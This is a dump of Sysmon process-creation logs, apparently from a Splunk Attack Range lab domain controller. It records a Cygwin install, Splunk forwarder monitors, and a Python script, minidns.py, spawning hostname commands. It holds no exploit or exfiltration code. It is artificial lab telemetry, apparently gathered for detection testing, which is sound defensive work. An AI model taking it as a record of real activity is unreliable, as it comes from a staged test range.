14:55:53.619{A8622C2F-53F9-6078-D207-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045112Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.607{A8622C2F-53F9-6078-D107-00000000AE01}5864C:\cygwin64\bin\touch.exe-----"C:\cygwin64\bin\touch.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=B77F237C5CCC4E8AEFEBB51610AA86B6,SHA256=E3F5B7A0F6C406E4C04BE6E14BAFCA27F1BC7A5299BC7151B9604B58057E0D66,IMPHASH=CA44AAF41C04E9C1E85EC55456ECCF59{A8622C2F-53F9-6078-D007-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045102Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.600{A8622C2F-53F9-6078-D007-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045092Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.588{A8622C2F-53F9-6078-CF07-00000000AE01}2084C:\cygwin64\bin\sort.exe-----"C:\cygwin64\bin\sort.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C16D6C2C86D1FD3F76F369B857FC51D2,SHA256=9CF25F5A9D0DD784BEE8278A61C2429CBF04C32D3407B78A9F3B1D0500F7ACCA,IMPHASH=BAA25F5285129EA97CBED20CD70B6EC7{A8622C2F-53F9-6078-CD07-00000000AE01}2508C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045076Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.580{A8622C2F-53F9-6078-CE07-00000000AE01}3220C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-CC07-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045072Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.580{A8622C2F-53F9-6078-CD07-00000000AE01}2508C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-CB07-00000000AE01}6748C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045062Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.573{A8622C2F-53F9-6078-CC07-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-CB07-00000000AE01}6748C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045050Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.565{A8622C2F-53F9-6078-CB07-00000000AE01}6748C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045038Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.548{A8622C2F-53F9-6078-CA07-00000000AE01}6336C:\cygwin64\bin\uname.exe-----"C:\cygwin64\bin\uname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=75B3A9DE22D28DFE34FC8B0C747B1B1F,SHA256=5E34E4152BD98DB6D32A543A7812ECF543933905123FE5BF82B708B5EAC0E50D,IMPHASH=8B550AB258E8F33E9A5161733CA078D7{A8622C2F-53F9-6078-C907-00000000AE01}5096C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045028Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.540{A8622C2F-53F9-6078-C907-00000000AE01}5096C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045016Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.532{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C707-00000000AE01}6700C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000045005Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.524{A8622C2F-53F9-6078-C707-00000000AE01}6700C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C107-00000000AE01}928C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000044993Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.504{A8622C2F-53F9-6078-C607-00000000AE01}4788C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-C507-00000000AE01}6452C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000044983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.496{A8622C2F-53F9-6078-C507-00000000AE01}6452C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C407-00000000AE01}5412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000044971Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.488{A8622C2F-53F9-6078-C407-00000000AE01}5412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C307-00000000AE01}1392C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000044961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.480{A8622C2F-53F9-6078-C307-00000000AE01}1392C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C107-00000000AE01}928C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000044946Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.399{A8622C2F-53F9-6078-C107-00000000AE01}928C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000044174Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:22.840{A8622C2F-53DA-6078-C007-00000000AE01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000044154Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:20.767{A8622C2F-53D8-6078-BF07-00000000AE01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000044144Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:20.090{A8622C2F-53D8-6078-BE07-00000000AE01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000044133Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:19.427{A8622C2F-53D7-6078-BD07-00000000AE01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000044119Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:17.505{A8622C2F-53D5-6078-BC07-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000044110Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:16.823{A8622C2F-53D4-6078-BB07-00000000AE01}2952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000044098Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:16.234{A8622C2F-53D4-6078-BA07-00000000AE01}6012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043927Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:34.135{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe-----"C:\Users\Administrator\Downloads\setup-x86_64.exe" C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=7A8C030CA58900E52EFC55D3B617F443,SHA256=4DD4D4531E8E63ADE849DAAAF587BA1C1430368701772C8EE42A27F4E8C373E4,IMPHASH=00000000000000000000000000000000{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000043817Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:27.186{A8622C2F-53A3-6078-B807-00000000AE01}3332C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.48.125640979\886223015" -childID 7 -isForBrowser -prefsHandle 7160 -prefMapHandle 7260 -prefsLen 13178 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 872 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000043756Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:22.817{A8622C2F-539E-6078-B707-00000000AE01}2676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043726Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:20.805{A8622C2F-539C-6078-B607-00000000AE01}5312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043710Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:20.237{A8622C2F-539C-6078-B507-00000000AE01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043688Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:19.575{A8622C2F-539B-6078-B407-00000000AE01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043643Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:17.723{A8622C2F-5399-6078-B307-00000000AE01}6304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043634Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:17.041{A8622C2F-5399-6078-B207-00000000AE01}1392C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043621Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:54:16.372{A8622C2F-5398-6078-B107-00000000AE01}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000043568Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:59.416{A8622C2F-5387-6078-B007-00000000AE01}5664C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exehostname -I C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{A8622C2F-5387-6078-AF07-00000000AE01}5108C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | awk '{print $1}'" 154100x800000000000000043560Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:59.409{A8622C2F-5387-6078-AF07-00000000AE01}5108C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | awk '{print $1}'"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5387-6078-AE07-00000000AE01}2424C:\Python27\python.exepython.exe c:\Temp\minidns.py 154100x800000000000000043552Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:59.363{A8622C2F-5387-6078-AE07-00000000AE01}2424C:\Python27\python.exe-----python.exe c:\Temp\minidns.pyC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000043517Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:39.407{A8622C2F-5373-6078-AD07-00000000AE01}2572C:\Python27\python.exe-----python.exeC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000043496Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:53:32.079{A8622C2F-536C-6078-AC07-00000000AE01}5516C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip.exe" install 